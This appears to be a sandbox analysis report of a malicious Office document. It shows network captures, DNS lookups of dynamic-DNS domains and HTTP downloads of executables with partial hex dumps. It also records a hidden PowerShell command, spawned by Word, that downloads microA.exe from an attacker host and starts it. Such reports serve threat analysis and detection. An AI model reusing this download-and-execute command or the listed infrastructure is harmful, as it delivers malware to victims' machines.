Aug 2, 2021 10:45:33.367516994 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367528915 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367541075 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367552042 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367573023 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367573977 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.367588043 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367599964 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.367607117 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367624998 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367636919 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.367641926 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367661953 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367676020 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367687941 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367700100 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367712021 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367728949 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367739916 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367748976 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.367752075 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367753983 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.367757082 CEST	49165	80	192.168.2.22	203.159.80.186

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 10:45:33.045478106 CEST	52197	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:45:33.101803064 CEST	53	52197	8.8.8.8	192.168.2.22
Aug 2, 2021 10:45:38.406434059 CEST	53099	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:45:38.441967010 CEST	53	53099	8.8.8.8	192.168.2.22
Aug 2, 2021 10:46:49.894620895 CEST	52838	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:46:49.937268019 CEST	53	52838	8.8.8.8	192.168.2.22
Aug 2, 2021 10:46:50.668577909 CEST	61200	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:46:50.701384068 CEST	53	61200	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:22.442781925 CEST	49548	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:22.570445061 CEST	53	49548	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:22.571191072 CEST	49548	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:22.709204912 CEST	53	49548	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:22.709851980 CEST	49548	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:22.743778944 CEST	53	49548	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:28.921278000 CEST	55627	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:28.957209110 CEST	53	55627	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:28.957798004 CEST	55627	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:28.993837118 CEST	53	55627	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:34.412760973 CEST	56009	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:34.445703983 CEST	53	56009	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:34.451452017 CEST	56009	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:34.484689951 CEST	53	56009	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:42.019104958 CEST	61865	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:42.051548958 CEST	53	61865	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:42.051903009 CEST	61865	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:42.084312916 CEST	53	61865	8.8.8.8	192.168.2.22
Aug 2, 2021 10:47:47.291620016 CEST	55171	53	192.168.2.22	8.8.8.8
Aug 2, 2021 10:47:47.334340096 CEST	53	55171	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 2, 2021 10:45:33.045478106 CEST	192.168.2.22	8.8.8.8	0xb648	Standard query (0)	newhosteeeee.ydns.eu	A (IP address)	IN (0x0001)
Aug 2, 2021 10:45:38.406434059 CEST	192.168.2.22	8.8.8.8	0xd9fb	Standard query (0)	newhosteeeee.ydns.eu	A (IP address)	IN (0x0001)
Aug 2, 2021 10:46:49.894620895 CEST	192.168.2.22	8.8.8.8	0xe6ff	Standard query (0)	sdafsdffssffs.ydns.eu	A (IP address)	IN (0x0001)
Aug 2, 2021 10:46:50.668577909 CEST	192.168.2.22	8.8.8.8	0x6bb3	Standard query (0)	hutyrtit.ydns.eu	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:22.442781925 CEST	192.168.2.22	8.8.8.8	0x364d	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:22.571191072 CEST	192.168.2.22	8.8.8.8	0x364d	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:22.709851980 CEST	192.168.2.22	8.8.8.8	0x364d	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:28.921278000 CEST	192.168.2.22	8.8.8.8	0xebea	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:28.957798004 CEST	192.168.2.22	8.8.8.8	0xebea	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:34.412760973 CEST	192.168.2.22	8.8.8.8	0xed62	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:34.451452017 CEST	192.168.2.22	8.8.8.8	0xed62	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:42.019104958 CEST	192.168.2.22	8.8.8.8	0xbb21	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:42.051903009 CEST	192.168.2.22	8.8.8.8	0xbb21	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:47.291620016 CEST	192.168.2.22	8.8.8.8	0x66f3	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 2, 2021 10:45:33.101803064 CEST	8.8.8.8	192.168.2.22	0xb648	No error (0)	newhosteeeee.ydns.eu	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:45:38.441967010 CEST	8.8.8.8	192.168.2.22	0xd9fb	No error (0)	newhosteeeee.ydns.eu	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:46:49.937268019 CEST	8.8.8.8	192.168.2.22	0xe6ff	No error (0)	sdafsdffssffs.ydns.eu	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:46:50.701384068 CEST	8.8.8.8	192.168.2.22	0x6bb3	No error (0)	hutyrtit.ydns.eu	203.159.80.165	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:22.570445061 CEST	8.8.8.8	192.168.2.22	0x364d	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:22.709204912 CEST	8.8.8.8	192.168.2.22	0x364d	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:22.743778944 CEST	8.8.8.8	192.168.2.22	0x364d	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:28.957209110 CEST	8.8.8.8	192.168.2.22	0xebea	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:28.993837118 CEST	8.8.8.8	192.168.2.22	0xebea	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:34.445703983 CEST	8.8.8.8	192.168.2.22	0xed62	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:34.484689951 CEST	8.8.8.8	192.168.2.22	0xed62	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:42.051548958 CEST	8.8.8.8	192.168.2.22	0xbb21	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:42.084312916 CEST	8.8.8.8	192.168.2.22	0xbb21	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:47:47.334340096 CEST	8.8.8.8	192.168.2.22	0x66f3	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

newhosteeeee.ydns.eu

hutyrtit.ydns.eu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	203.159.80.186	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 10:45:33.158689976 CEST	0	OUT	GET /microA.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: newhosteeeee.ydns.eu Connection: Keep-Alive
Aug 2, 2021 10:45:33.238982916 CEST	2	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Fri, 30 Jul 2021 09:52:56 GMT Accept-Ranges: bytes ETag: "b34311ac2885d71:0" Server: Microsoft-IIS/8.5 Date: Mon, 02 Aug 2021 08:45:33 GMT Content-Length: 525312 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ef cb 03 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d0 07 00 00 32 00 00 00 00 00 00 ea ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 ee 07 00 57 00 00 00 00 00 08 00 84 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 ce 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 2f 00 00 00 00 08 00 00 30 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 cc 07 00 98 21 00 00 03 00 00 00 1c 00 00 06 d4 40 00 00 24 8c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1b 1e 2d 08 26 28 16 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 17 00 00 0a 74 02 00 00 02 19 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 18 00 00 0a 02 03 16 2c 14 26 26 02 28 19 00 00 0a 6f 1a 00 00 0a 1b 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b e7 7d 04 00 00 04 2b 00 2a 00 00 06 2a 00 00 13 30 04 00 1b 01 00 00 01 00 00 11 02 7b 02 00 00 04 1d 2d 29 26 06 45 08 00 00 00 07 00 00 00 32 00 00 00 4d 00 00 00 6f 00 00 00 8a 00 00 00 ac 00 00 00 c7 00 00 00 e2 00 00 00 2b 03 0a 2b d5 16 2a 02 15 16 2c 17 26 26 02 20 af dd aa 79 1a 2d 13 26 26 02 17 7d 02 00 00 04 17 2b 0e 7d 02 00 00 04 2b e4 7d 03 00 00 04 2b e8 2a 02 15 7d 02 00 00 04 02 20 c7 84 f2 fd 7d 03 00 00 04 02 18 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 02 7b 05 00 00 04 20 86 e4 dd 4e 61 7d 03 00 00 04 02 19 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 20 da f8 35 95 7d 03 00 00 04 02 1a 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 02 7b 05 00 00 04 20 2a 49 82 37 61 7d 03 00 00 04 02 1b 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 20 41 cb 44 11 7d 03 00 00 04 02 1c 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 20 3f c8 cb 5c 7d 03 00 00 04 02 1d 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 16 2a 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 19 1d 2d 08 26 7b 03 00 00 04 2b 03 26 2b f6 2a 00 00 00 1a 73 1b 00 00 0a 7a 00 03 30 0a 00 16 00 00 00 00 00 00 00 02 1a 1a 2d 0d 26 7b 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa2 @ `@W/@ H.text `.rsrc/0@@.reloc@@BH!@$0-&(+&+0s(t-&++~0.(,&&(o-&&+}+}+0{-)&E2Mo++,&& y-&&}+}+}+} }}}{ Na}}} 5}}}{ I7a}}} AD}}} ?\}}}0-&{+&+sz0-&{

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	203.159.80.186	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 10:45:38.498917103 CEST	554	OUT	GET /microA.exe HTTP/1.1 Host: newhosteeeee.ydns.eu Connection: Keep-Alive
Aug 2, 2021 10:45:38.552856922 CEST	555	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Fri, 30 Jul 2021 09:52:56 GMT Accept-Ranges: bytes ETag: "b34311ac2885d71:0" Server: Microsoft-IIS/8.5 Date: Mon, 02 Aug 2021 08:45:38 GMT Content-Length: 525312 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ef cb 03 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d0 07 00 00 32 00 00 00 00 00 00 ea ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 ee 07 00 57 00 00 00 00 00 08 00 84 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 ce 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 2f 00 00 00 00 08 00 00 30 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 cc 07 00 98 21 00 00 03 00 00 00 1c 00 00 06 d4 40 00 00 24 8c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1b 1e 2d 08 26 28 16 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 17 00 00 0a 74 02 00 00 02 19 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 18 00 00 0a 02 03 16 2c 14 26 26 02 28 19 00 00 0a 6f 1a 00 00 0a 1b 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b e7 7d 04 00 00 04 2b 00 2a 00 00 06 2a 00 00 13 30 04 00 1b 01 00 00 01 00 00 11 02 7b 02 00 00 04 1d 2d 29 26 06 45 08 00 00 00 07 00 00 00 32 00 00 00 4d 00 00 00 6f 00 00 00 8a 00 00 00 ac 00 00 00 c7 00 00 00 e2 00 00 00 2b 03 0a 2b d5 16 2a 02 15 16 2c 17 26 26 02 20 af dd aa 79 1a 2d 13 26 26 02 17 7d 02 00 00 04 17 2b 0e 7d 02 00 00 04 2b e4 7d 03 00 00 04 2b e8 2a 02 15 7d 02 00 00 04 02 20 c7 84 f2 fd 7d 03 00 00 04 02 18 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 02 7b 05 00 00 04 20 86 e4 dd 4e 61 7d 03 00 00 04 02 19 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 20 da f8 35 95 7d 03 00 00 04 02 1a 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 02 7b 05 00 00 04 20 2a 49 82 37 61 7d 03 00 00 04 02 1b 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 20 41 cb 44 11 7d 03 00 00 04 02 1c 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 20 3f c8 cb 5c 7d 03 00 00 04 02 1d 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 16 2a 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 19 1d 2d 08 26 7b 03 00 00 04 2b 03 26 2b f6 2a 00 00 00 1a 73 1b 00 00 0a 7a 00 03 30 0a 00 16 00 00 00 00 00 00 00 02 1a 1a 2d 0d 26 7b 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa2 @ `@W/@ H.text `.rsrc/0@@.reloc@@BH!@$0-&(+&+0s(t-&++~0.(,&&(o-&&+}+}+0{-)&E2Mo++,&& y-&&}+}+}+} }}}{ Na}}} 5}}}{ I7a}}} AD}}} ?\}}}0-&{+&+sz0-&{

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49168	203.159.80.165	80	C:\Users\user\AppData\Local\Temp\images.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 10:46:50.757095098 CEST	1177	OUT	GET /microC.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: hutyrtit.ydns.eu Connection: Keep-Alive
Aug 2, 2021 10:46:50.787972927 CEST	1178	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 02 Aug 2021 07:13:53 GMT Accept-Ranges: bytes ETag: "382415f36d87d71:0" Server: Microsoft-IIS/8.5 Date: Mon, 02 Aug 2021 08:46:50 GMT Content-Length: 1378816 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 31 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 37 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 45 00 00 70 7e 07 00 00 04 6f 2d 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL1aP.L `@ `@KO` @ H.text, . `.rsrc `0@@.reloc@@BKH0dso(&(ss s!s"s#0~o$+0~o%+0~o&+0~o'+0~o(+0<~(),!rp(o+s,~+0~+"0&(r1p~o-(.t$+0&(r7p~o-(.t$+0&(r?p~o-(.t$+*0&(rEp~o-

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2640 Parent PID: 584

General

Start time:	10:45:37
Start date:	02/08/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fef0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 2776 Parent PID: 2640

General

Start time:	10:45:39
Start date:	02/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Imagebase:	0x13fb00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.2099841469.0000000000390000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: FLTLDR.EXE PID: 2532 Parent PID: 2640

General

Start time:	10:45:40
Start date:	02/08/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Imagebase:	0x13f4d0000
File size:	157024 bytes
MD5 hash:	AF5CCD95BAC7ADADD56DE185D7461B2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
